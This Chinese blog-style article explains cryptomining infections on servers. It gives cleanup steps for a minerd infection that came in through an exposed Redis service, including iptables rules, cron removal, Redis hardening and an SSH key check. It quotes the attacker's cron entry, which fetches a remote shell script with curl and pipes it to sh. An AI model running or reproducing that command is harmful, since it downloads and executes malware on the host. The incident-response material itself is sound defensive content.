服务器被挖矿，服务器被检测出挖矿

其实服务器被挖矿的问题并不复杂，但是又很多的朋友都不太了解服务器被检测出挖矿，因此呢，今天小编就来为大家分享服务器被挖矿的一些知识，希望可以帮助到大家，下面我们一起来看看这个问题的分析吧！

被挖矿是什么意思

就是被获取了比特币。

挖矿是指利用电脑硬件计算出比特币的位置并获取比特币，这一过程被称之为挖矿。每隔一个时间点，比特币系统会在系统节点上生成一个随机代码，互联网中的所有计算机都可以去寻找此代码，谁找到此代码，就会产生一个区块，随即得到一个比特币，这个过程就是人们常说的挖矿。

计算这个随机代码需要大量的GPU运算，于是矿工们采购海量显卡用以更快速的获得比特币获利。比特币挖矿机，就是用于赚取比特币的电脑，这类电脑一般有专业的挖矿芯片，多采用烧显卡的方式工作，耗电量较大。用户用个人计算机下载软件然后运行特定算法，与远方服务器通讯后可得到相应比特币，是获取比特币的方式之一。

服务器被检测出挖矿

有位朋友说，他服务器使用的好好的，服务商突然封了他服务器，说是被检测出挖矿，这位朋友一脸懵“我开游戏的，挖什么矿”。突然地关停服务器导致这位朋友损失惨重，那么为什么会被检测出挖矿，以及怎么处理呢？感兴趣的话就继续往下看吧~

遇到以上问题，需要先找服务器商对其说明实际情况，配合他们排查，基本上就是中了挖矿病毒。

最简单的方法就是重装系统，但是系统盘数据都会清空，这种办法适用于服务器里没什么需要备份的文件。如果选择重装系统，需要把自己的文件扫毒一遍确认安全后再导入服务器。

但是服务器里如果有很多重要的文件还有比较难配置的环境，那就需要排查删除挖矿程序，全盘扫毒，删除可疑文件，一个个修复病毒对系统的修改。

防范建议：

1.尽量不要使用默认密码和端口，改一个比较复杂的密码

2.可以使用宝塔面板登陆服务器

3.系统自带的防火墙、安全防护都不要关闭

阿里云服务器被挖矿了怎么办(纯纯电脑小白

1.关闭访问挖矿服务器的访问

iptables-A INPUT-s xmr.crypto-pool.fr-j DROP and iptables-A OUTPUT-d xmr.crypto-pool.fr-j DROP.

2. chmod-x minerd,取消掉执行权限，在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd,杀掉进程

4. service stop crond或者 crontab-r删除所有的执行计划

5.执行top，查看了一会，没有再发现minerd进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5**** curl-fsSL http://www.haveabitchin.com/pm.sh?0105010| sh

病毒文件内容如下，感兴趣的可以研究下：

 View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1.修复 redis的后门,

配置bind选项,限定可以连接Redis服务器的IP,并修改redis的默认端口6379.

配置AUTH,设置密码,密码会以明文方式保存在redis配置文件中.

配置rename-command CONFIG“RENAME_CONFIG”,这样即使存在未授权访问,也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

2.打开~/.ssh/authorized_keys,删除你不认识的账号

3.查看你的用户列表，是不是有你不认识的用户添加进来。如果有就删除掉.

好了，关于服务器被挖矿和服务器被检测出挖矿的问题到这里结束啦，希望可以解决您的问题哈！